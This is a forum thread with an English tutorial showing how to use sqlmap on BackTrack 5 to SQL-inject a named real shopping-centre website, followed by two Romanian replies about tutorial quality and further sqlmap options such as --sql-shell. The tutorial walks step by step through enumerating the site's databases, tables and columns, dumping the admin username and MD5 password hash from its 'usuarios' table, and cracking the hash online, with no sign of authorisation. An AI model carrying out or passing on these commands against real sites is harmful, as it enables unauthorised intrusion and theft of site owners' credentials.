Jump to content
Guest expl0iter

[Complete Package]SQL Injection Attack by BackTrack 5

By Guest expl0iter, in Tutoriale in engleza

Recommended Posts

Guest expl0iter

Guest expl0iter

Posted
Posted

Hello Viewer, Now i am come again with my new thread. You like my old post Hack Facebook,Gmail,Yahoo and Twitter Account by BT5 so thanks for it. Now i am going to write my new tutorial in Backtrack Series.

I think you would know or hear about SQL Injection, IF you say "YES" so it's is good or else you say "NO" so please read about it by my old post...

Complete SQL Injection Attacks With Pics

Hack Website By Havij

I think my old tutorial is too good and also very helpful for a Newbie. Here i will going to tell you only How to Doing SQL INJECTION Attacks by BackTrack 5.

So Follow my steps and done it successfully!!!!

STEP1: Below pic show you a website which name is Jun?n | Centros Comerciales ,Now i am used my Backtrack Skill and find that website Admin name and password.

0.PNG

STEP2: Open your BackTrack Terminal and Write "cd /pentest/web/scanners/sqlmap" and Hit Enter Key like below pic...

11.PNG

STEP3: Now i am going to find out Website DataBase name,so for it write...

python sqlmap.py -u http:JUNIN - CENTROS COMERCIALES NOTICIAS --dbs

For Example see below pic...

12.PNG

STEP4: When you done step 3 then you see after sometime processing a list of DataBase name come like below pic in which all name under RED color ring...

13.PNG

Now choose any DataBase name for Forward Processing.In my case,i am select " junincc_junincc ".

STEP5: After select DB name now write on forward step...

python sqlmap.py -u http:JUNIN - CENTROS COMERCIALES NOTICIAS -D junincc_junincc --tables

i am write these command for find tables name under DataBase junincc_junincc see below pic...

14.PNG

STEP6: When you have done step 5 then you see a list of tables come,In my case you see below pic where tables name in under of RED color ring....

15.PNG

Now here i am select "usuarios" for find out columns name by Tables.

STEP7: For Find Columns name of any Table write below command...

python sqlmap.py -u http:JUNIN - CENTROS COMERCIALES NOTICIAS -D junincc_junincc -T usuarios --columns

See below pic...

16.PNG

STEP8: When you have done step 7 then you found a list of Table's columns,see below pic all columns name in table usuarios write in RED color ring...

17.PNG

Here i am select two Columns name for future work which name is " clave , usuario " .

STEP9: Now i am going to find about columns information which save in column "clave , usuario" ,so run these command......

python sqlmap.py -u http:JUNIN - CENTROS COMERCIALES NOTICIAS -D junincc_junincc -T usuarios -C clave,usuario --dump

See below pic...

18.PNG

STEP10: When you run step 9 command then in some steps it ask for forward processing show you write " Y " and press ENTER KEY,see below pic...

19.PNG

STEP11: Wait for some time then you see result like below pic...

20.PNG

Here "admin" is the ADMIN account ID Name and password encrypt in MD5 ,For Decrypt it go to online MD5 Decryption Website and Decrypt the Password of Admin site.

I hope u will be successful in your work,so all the BEST!

sursa: HACKARDE: SQL Injection Attack by BackTrack 5

Link to comment
Share on other sites
Guest expl0iter

Guest expl0iter

Posted
Posted
Toti facem face tutoriale despre sqlmap. Problema este ca explicam aceleasi chestii elementare, luate unii de la altii. Sunt atatea moduri frumoase in care se poate lucra cu sqlmap si majoritatea aratam doar cum se extrage un amarat de tabel si cateva coloane.

Nu toti sunt avansati in domeniu. Ca sa inveti chestii mai dificile trebuie sa incepi cu chestii banale.

Link to comment
Share on other sites
malsploit Newbie

malsploit

Posted
Posted

Ma refeream la metodele care sunt folosite in tutoriale. Daca incerci sa cauti cu google tutoriale sqlmap, o sa gasesti cateva zeci de tutoriale care trateaza aceeasi problema in acelasi mod. De exemplu in cazul de mai sus putea sa foloseasca --search -C usuario sau se folosea de --sql-shell, si executa comenzi sql direct.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...